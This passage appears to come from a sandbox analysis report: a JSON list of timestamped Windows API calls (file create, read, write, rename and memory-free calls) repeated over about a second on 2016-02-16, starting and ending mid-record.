"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "NtSetInformationFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:42:06,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,057", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:06,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:06,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": 
"NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,137", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,157", "api": "NtFreeVirtualMemory"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:06,197", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,247", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,247", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:06,257", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,277", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,287", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", 
"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,307", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,318", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,328", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,328", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,338", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:06,348", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,348", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,358", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,358", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,368", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,368", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,378", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,378", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,378", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,388", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,388", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,388", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,398", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,398", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,398", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,408", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,408", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,418", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,418", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,418", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:06,428", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,428", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,438", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,438", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,438", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,448", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,468", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,478", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,498", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,518", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,518", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,518", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:06,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,598", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,598", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:06,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,658", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,668", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,728", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 